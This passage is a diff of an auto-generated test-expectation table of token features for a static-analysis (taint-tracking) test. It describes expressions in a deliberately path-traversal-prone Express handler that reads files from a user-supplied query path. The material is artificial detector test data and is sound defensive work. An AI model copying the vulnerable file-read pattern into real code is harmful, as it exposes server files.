slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:27 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:27 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:27 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:27 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -7975,6 +71919,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:99:13:99:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/normalizedPaths.js:99:16:99:27 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:99:16:99:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:99:16:99:27 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:99:16:99:27 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:99:16:99:27 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | calleeImports | fs | @@ -7984,6 +71933,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:99:29:99:32 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:21 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | exceptional return of path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | exceptional return of path.st ... r/www') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | exceptional return of path.st ... r/www') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | exceptional return of path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | exceptional return of path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | path.st ... r/www') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | path.st ... r/www') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:101:7:101:39 | path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:101:12:101:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:101:12:101:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:101:12:101:21 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:101:12:101:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:101:12:101:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | calleeImports | path | @@ -7993,6 +71967,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:101:23:101:38 | '/home/user/www' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:7 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:7 | res | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:7 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:13 | res.write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:13 | res.write | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:13 | res.write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:13 | res.write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | exceptional return of res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | res.wri ... (path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | res.wri ... (path)) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | res.wri ... (path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:5:102:36 | res.wri ... (path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:9:102:13 | write | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:9:102:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:9:102:13 | write | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:9:102:13 | write | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:9:102:13 | write | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:16 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:16 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:16 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:16 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:29 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:29 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:29 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:29 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8001,6 +72015,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:102:15:102:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/normalizedPaths.js:102:18:102:29 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:102:18:102:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:102:18:102:29 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path res write fs readFileSync path path startsWith /home/user/www res write fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:102:18:102:29 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:102:18:102:29 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | calleeImports | fs | @@ -8010,6 +72029,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:102:31:102:34 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:105:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:1:114:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:5:105:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:5:105:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:5:105:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | calleeImports | express | @@ -8017,6 +72051,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:105:9:105:25 | '/combined-check' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:105:27 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -8024,11 +72073,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:28:114:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:29:105:31 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:105:34:105:36 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:105:34:105:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:105:34:105:36 | res | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:105:34:105:36 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:105:34:105:36 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:7:106:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path path startsWith /home/user/www fs readFileSync path path 0 0 / path 0 0 . fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:106:14:106:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| 